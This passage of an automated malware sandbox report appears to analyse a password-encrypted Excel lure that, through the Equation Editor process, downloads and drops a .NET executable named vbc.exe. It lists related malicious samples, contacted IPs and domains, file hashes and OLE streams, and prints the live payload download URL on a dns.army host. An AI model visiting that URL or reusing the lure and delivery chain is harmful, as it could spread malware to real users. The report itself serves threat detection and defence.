	Request for Quotation.exe	Get hash	malicious	Browse	www.houstonlasertreatment.com/9t6k/?wR=ZCRzbh+mV5U9jV63l/ePyvYN+FvSTSwK5UsHcLfRd9SkNZvXg97F8eocX5PPbm4+ZEyk&S0Gll=RRHTxr6PgzuH1
	Purchase order nr.0119-21.exe	Get hash	malicious	Browse	www.pausmam.com/n6sn/?Ezu=UTChYH0pLxS4_d1&Y4sX6bJP=3AnMkeGG2tUq5yfyW6XY4HZIQPS/0XzehrQH6pNoacETLQZfVVzXjlG1MBV8mhQKU3h/
216.239.32.21	Quote_13940007.exe	Get hash	malicious	Browse	ifconfig.me/ip
	SKBM 0222.exe	Get hash	malicious	Browse	ifconfig.me/ip
	crypted.exe	Get hash	malicious	Browse	ifconfig.me/ip
	002.docx	Get hash	malicious	Browse	ipinfo.io/84.17.52.38/country
	SKBM 0222..exe	Get hash	malicious	Browse	ifconfig.me/ip
	SecuriteInfo.com.Heur.11712.xls	Get hash	malicious	Browse	myexternalip.com/raw
	SecuriteInfo.com.Heur.20369.xls	Get hash	malicious	Browse	ipinfo.io/ip
	6anfy8I0II.exe	Get hash	malicious	Browse	ipecho.net/plain
	attach-581976319.xls	Get hash	malicious	Browse	myexternalip.com/raw
	SPECIFICATION.exe	Get hash	malicious	Browse	ipecho.net/plain
	attach-1587508589.xls	Get hash	malicious	Browse	ipinfo.io/ip
	attach-652257188.xls	Get hash	malicious	Browse	ipecho.net/plain
	Efo7RLFvtt.exe	Get hash	malicious	Browse	ipecho.net/plain
	QwLijaR9ex.exe	Get hash	malicious	Browse	ipecho.net/plain
	order_list_fe99087.xls	Get hash	malicious	Browse	ipecho.net/plain
	Mkq2f1T81k.exe	Get hash	malicious	Browse	ipecho.net/plain
	opgVccK0a8.exe	Get hash	malicious	Browse	ipinfo.io/ip
	Attach-1851392551-HN2104490797.xls	Get hash	malicious	Browse	ipinfo.io/ip
	sukqic.exe	Get hash	malicious	Browse	ifconfig.me//
	THVRpcyOf1.exe	Get hash	malicious	Browse	myexternalip.com/raw

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ow.ly	QTN3C2AF414EDF9_041873.xlsx	Get hash	malicious	Browse	54.67.57.56
	TIC ENQ2040 FCl.xlsx	Get hash	malicious	Browse	54.67.57.56
	MV ASIA EMERALD II.xlsx	Get hash	malicious	Browse	54.67.57.56
	TRANSIT MANIFEST CARGO FORM.xlsx	Get hash	malicious	Browse	54.67.120.65
	ORDER LIST.xlsx	Get hash	malicious	Browse	54.67.62.204
	BL + PL + CI.xlsx	Get hash	malicious	Browse	54.67.120.65
	#U007einvoice#U007eSC00978656.xlsx	Get hash	malicious	Browse	54.67.57.56
	New_Message00934.htm	Get hash	malicious	Browse	54.67.57.56
	https://u17588438.ct.sendgrid.net/ls/click?upn=h-2Bj1pe3h4Ysprj-2F8RRf9ChxAthv8oUCYMnydAOiqdZUW-2BWPjSW0-2FEf5GesIstZyF0TVG_lbRSzjTjAOmWKCI6GhhOife1Jj1xtmqeANf3i3jW3opERdKAfB6RW1d9S3-2BY3uAZ73G93x4NRv3SGU9GC4XSs1eCeVJJbjnXgiEyfnLUrO5zxeR-2BpWFMutEFdboHQGx95igAqkR70Vu4Hiwd9NcrDdrJs-2BOivQ93TFqP-2BT4HPMkXW0NLxBKQVPvAgnXNChoww1TXGQN2qsuqwn8GkbQaq3PqNM7QYH3v-2Fv5T56RWSqXIWExu7REiKCcAp9f6Du8y	Get hash	malicious	Browse	54.67.120.65
	https://u18021447.ct.sendgrid.net/ls/click?upn=4-2B97j-2BtYQoCI2fDYEybJE8VXu-2FoT5KUlTEBIP-2FZpwja1LaUJU-2BvsibdvO6vqoNKGEtLN_tkuwbiJYWhKaepE-2BM1TZDajlOQqjy023dIArdFfY4Q7aInX1fHyzMaSNgDpN4RXFFT28Nvm4lTgRP2Lo2wigkcpLbULWR3rg-2FE60qFalXBd1XauXGfqffZ3Vso2GpH8M2RIy-2BLstJ0DTX5Ex-2FSV3rlGx9ZgW98jLaWYfY9EKxp-2Bb-2FdkzvrNyt500LWgC9ORMQ0r6YfW8Y79Zk2VNJnudzlxb1CJo-2FW7Zs6eo8A-2FWgzs-3D	Get hash	malicious	Browse	54.67.62.204
	http://ow.ly/nDiV30mD63n	Get hash	malicious	Browse	54.183.132.164
	http://ow.ly/Rrh750jwUFv	Get hash	malicious	Browse	54.67.57.56
	GTEDS.pdf	Get hash	malicious	Browse	54.67.120.65
	GTEDS.pdf	Get hash	malicious	Browse	54.183.130.144
	Marine Engine Spare Parts Order_first.pdf	Get hash	malicious	Browse	54.67.120.65
	CCS Projects.pdf	Get hash	malicious	Browse	54.183.132.164
	http://ow.ly/8rYF30jYWv5	Get hash	malicious	Browse	54.67.120.65
	Locked.pdf	Get hash	malicious	Browse	54.183.131.91
	http://ow.ly/avIT30jzSjv	Get hash	malicious	Browse	54.67.120.65
	9a835a425c8321c22d5a751078cb5f020abaaaafe7cf80fee68237d0811fcae.pdf	Get hash	malicious	Browse	54.183.130.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	QTN3C2AF414EDF9_041873.xlsx	Get hash	malicious	Browse	52.57.196.177
	TIC ENQ2040 FCl.xlsx	Get hash	malicious	Browse	54.67.57.56
	MV ASIA EMERALD II.xlsx	Get hash	malicious	Browse	54.67.57.56
	TRANSIT MANIFEST CARGO FORM.xlsx	Get hash	malicious	Browse	54.67.120.65
	8TD8GfTtaW.exe	Get hash	malicious	Browse	104.192.141.1
	R4VugGhHOo.exe	Get hash	malicious	Browse	18.197.52.125
	RFQ.exe	Get hash	malicious	Browse	52.58.78.16
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	13.57.130.120
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	35.158.240.78
	ORDER LIST.xlsx	Get hash	malicious	Browse	54.67.62.204
	BL + PL + CI.xlsx	Get hash	malicious	Browse	54.67.120.65
	#U007einvoice#U007eSC00978656.xlsx	Get hash	malicious	Browse	54.67.57.56
	FortPlayerInstaller.exe	Get hash	malicious	Browse	13.224.94.78
	RGB HeroInstaller.exe	Get hash	malicious	Browse	99.86.159.18
	Buff-Installer.exe	Get hash	malicious	Browse	13.224.195.128
	PO_210222.exe	Get hash	malicious	Browse	52.58.78.16
	Order83930.exe	Get hash	malicious	Browse	3.131.252.17
	rieuro.dll	Get hash	malicious	Browse	143.204.4.74
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	52.213.114.86
	document-1915351743.xls	Get hash	malicious	Browse	143.204.4.74
GOOGLEUS	fedex.apk	Get hash	malicious	Browse	142.250.186.138
	Malody-4.3.7.apk	Get hash	malicious	Browse	142.250.186.74
	Malody-4.3.7.apk	Get hash	malicious	Browse	142.250.186.42
	Quote_13940007.exe	Get hash	malicious	Browse	216.239.32.21
	0O9BJfVJi6fEMoS.exe	Get hash	malicious	Browse	34.102.136.180
	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Get hash	malicious	Browse	34.102.136.180
	dex.dex	Get hash	malicious	Browse	142.250.185.202
	dex.dex	Get hash	malicious	Browse	142.250.185.170
	SKBM 0222.exe	Get hash	malicious	Browse	216.239.32.21
	lpdKSOB78u.exe	Get hash	malicious	Browse	34.102.136.180
	vBugmobiJh.exe	Get hash	malicious	Browse	34.102.136.180
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	34.102.136.180
	crypted.exe	Get hash	malicious	Browse	216.239.32.21
	NewOrder.xlsm	Get hash	malicious	Browse	34.102.136.180
	Order_20180218001.exe	Get hash	malicious	Browse	34.102.136.180
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	34.102.136.180
	SOA.exe	Get hash	malicious	Browse	35.186.238.101
	ORDER LIST.xlsx	Get hash	malicious	Browse	34.102.136.180
	File Downloader [14.5].apk	Get hash	malicious	Browse	142.250.186.74
	PO_210222.exe	Get hash	malicious	Browse	34.102.136.180
GOOGLEUS	fedex.apk	Get hash	malicious	Browse	142.250.186.138
	Malody-4.3.7.apk	Get hash	malicious	Browse	142.250.186.74
	Malody-4.3.7.apk	Get hash	malicious	Browse	142.250.186.42
	Quote_13940007.exe	Get hash	malicious	Browse	216.239.32.21
	0O9BJfVJi6fEMoS.exe	Get hash	malicious	Browse	34.102.136.180
	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Get hash	malicious	Browse	34.102.136.180
	dex.dex	Get hash	malicious	Browse	142.250.185.202
	dex.dex	Get hash	malicious	Browse	142.250.185.170
	SKBM 0222.exe	Get hash	malicious	Browse	216.239.32.21
	lpdKSOB78u.exe	Get hash	malicious	Browse	34.102.136.180
	vBugmobiJh.exe	Get hash	malicious	Browse	34.102.136.180
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	34.102.136.180
	crypted.exe	Get hash	malicious	Browse	216.239.32.21
	NewOrder.xlsm	Get hash	malicious	Browse	34.102.136.180
	Order_20180218001.exe	Get hash	malicious	Browse	34.102.136.180
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	34.102.136.180
	SOA.exe	Get hash	malicious	Browse	35.186.238.101
	ORDER LIST.xlsx	Get hash	malicious	Browse	34.102.136.180
	File Downloader [14.5].apk	Get hash	malicious	Browse	142.250.186.74
	PO_210222.exe	Get hash	malicious	Browse	34.102.136.180
AMAZON-02US	QTN3C2AF414EDF9_041873.xlsx	Get hash	malicious	Browse	52.57.196.177
	TIC ENQ2040 FCl.xlsx	Get hash	malicious	Browse	54.67.57.56
	MV ASIA EMERALD II.xlsx	Get hash	malicious	Browse	54.67.57.56
	TRANSIT MANIFEST CARGO FORM.xlsx	Get hash	malicious	Browse	54.67.120.65
	8TD8GfTtaW.exe	Get hash	malicious	Browse	104.192.141.1
	R4VugGhHOo.exe	Get hash	malicious	Browse	18.197.52.125
	RFQ.exe	Get hash	malicious	Browse	52.58.78.16
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	13.57.130.120
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	35.158.240.78
	ORDER LIST.xlsx	Get hash	malicious	Browse	54.67.62.204
	BL + PL + CI.xlsx	Get hash	malicious	Browse	54.67.120.65
	#U007einvoice#U007eSC00978656.xlsx	Get hash	malicious	Browse	54.67.57.56
	FortPlayerInstaller.exe	Get hash	malicious	Browse	13.224.94.78
	RGB HeroInstaller.exe	Get hash	malicious	Browse	99.86.159.18
	Buff-Installer.exe	Get hash	malicious	Browse	13.224.195.128
	PO_210222.exe	Get hash	malicious	Browse	52.58.78.16
	Order83930.exe	Get hash	malicious	Browse	3.131.252.17
	rieuro.dll	Get hash	malicious	Browse	143.204.4.74
	AWB-INVOICE_PDF.exe	Get hash	malicious	Browse	52.213.114.86
	document-1915351743.xls	Get hash	malicious	Browse	143.204.4.74

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1] Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	687616
Entropy (8bit):	6.788526402195906
Encrypted:	false
SSDEEP:	6144:wxwz1c/m/gGqitttttwgGTyWI+G4bNSrAxx3qK6L+/rKniN0s2sdUgBODIpFds5O:9dSTES5//6L/iYsGgBODIpFds5erS8
MD5:	2201881C6CC2DE12C71F906E43178EF9
SHA1:	2B494DB5E52B74DF25FF068D0D2A3295AAE4F658
SHA-256:	945EBBAF8C08902ED75EB98F5CABD2DBD88708C1AAC37A35762DB091C1CE0476
SHA-512:	4DDF35B3D8C49C9334FE4E32E0DB68B2780AD8528DC31595AE7D63906625FAA045AAED0EF84A4264A29C3B8DB8C35054478898DF914C3DF0512618EDEA59F167
Malicious:	true
Reputation:	low
IE Cache URL:	http://msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?platform=hootsuite
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4`..............0..t.............. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............\|..............@..B........................H.......,[...............C...O.............................................}.....(.......(......{....r...p~/...(....o......{....o....&..0............r...p(....&......o....&......................n..t.....o......{....o....&.....(.....~..{....o......{....o....(......0..+.........,..{.......+....,...{....o........( ......0............s!...}.........("...s#.....s$...}.....s%...}.....s%...}......{....s&...}.....s'...}.....s%...}.....s%...}.....s(...}.....{....o).....{....o)..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18EE8C7E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.8986034680495374
Encrypted:	false
SSDEEP:	3072:w34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:K4UcLe0JOqQQZR8MDdATCR3tS+jqcC
MD5:	19B121F27DD04EC49BB9CCF081092DF9
SHA1:	70098B4ED8B5D9CDD59645069FF312BB9DB48709
SHA-256:	2CECCA93198BE134404F455F0898A4536ED969A0B56B2D91AC26BE8889EF1B46
SHA-512:	949380F9968131359C7F1496FADE07AB2F77536A3568C33A411ECE8190ACE44E122233C6784482C1BFDBF5F2B38715A0255DD7D3E42FE6B0DA62BA2EF29E0F36
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i..................................................... ... ....... .x. ..N.W.. ... .....`. ... ..N.W.. ... . ....y.R.. ... . ............z.R............?...............................X...%...7...................{ .@................C.a.l.i.b.r............... .X..... .$. ..2.Q........`. .`. ..{.Q...... .....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D94740D.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	111378
Entropy (8bit):	7.963743447431302
Encrypted:	false
SSDEEP:	3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5:	5ACDB72AF63832D23CED937B6B976471
SHA1:	BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256:	6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512:	FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..\|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...\|.n\|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DA16D3C.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8655667.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	111378
Entropy (8bit):	7.963743447431302
Encrypted:	false
SSDEEP:	3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5:	5ACDB72AF63832D23CED937B6B976471
SHA1:	BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256:	6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512:	FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..\|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...\|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...\|.n\|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC0C12AA.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\Desktop\~$MT OCEAN STAR ISO 8217 2005.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	687616
Entropy (8bit):	6.788526402195906
Encrypted:	false
SSDEEP:	6144:wxwz1c/m/gGqitttttwgGTyWI+G4bNSrAxx3qK6L+/rKniN0s2sdUgBODIpFds5O:9dSTES5//6L/iYsGgBODIpFds5erS8
MD5:	2201881C6CC2DE12C71F906E43178EF9
SHA1:	2B494DB5E52B74DF25FF068D0D2A3295AAE4F658
SHA-256:	945EBBAF8C08902ED75EB98F5CABD2DBD88708C1AAC37A35762DB091C1CE0476
SHA-512:	4DDF35B3D8C49C9334FE4E32E0DB68B2780AD8528DC31595AE7D63906625FAA045AAED0EF84A4264A29C3B8DB8C35054478898DF914C3DF0512618EDEA59F167
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4`..............0..t.............. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............\|..............@..B........................H.......,[...............C...O.............................................}.....(.......(......{....r...p~/...(....o......{....o....&..0............r...p(....&......o....&......................n..t.....o......{....o....&.....(.....~..{....o......{....o....(......0..+.........,..{.......+....,...{....o........( ......0............s!...}.........("...s#.....s$...}.....s%...}.....s%...}......{....s&...}.....s'...}.....s%...}.....s%...}.....s(...}.....{....o).....{....o)..

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.99653628950697
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	MT OCEAN STAR ISO 8217 2005.xlsx
File size:	2245120
MD5:	3ba4a9ceac60a4e52398ac6fbd0ebc5b
SHA1:	19b79bcd8982634747f1dfc6804687d60baf73b0
SHA256:	ca4c055b60e84b73461e21062fc06924897c501944ec0f2a467fc4c21f13b342
SHA512:	ff14cc9946821af0891fb2b8ae10006ea9902f31c6cfcc5bc6739270080a3862db34e718cf82838585662a3dbad74892db78e891092a9cd0e137e86684440686
SSDEEP:	49152:YCh6WqY0TZZ72n8aEEQGwTN/q6gPwzxj32LrhoDD9DJ:YChyLk8lgJPQxb2Lub
File Content Preview:	........................>...................#...................................................................................\|.......~...............z.......\|.......~...............z.......\|.......~......................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MT OCEAN STAR ISO 8217 2005.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2223464

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2223464
Entropy:	7.99991099371
Base64 Encoded:	True
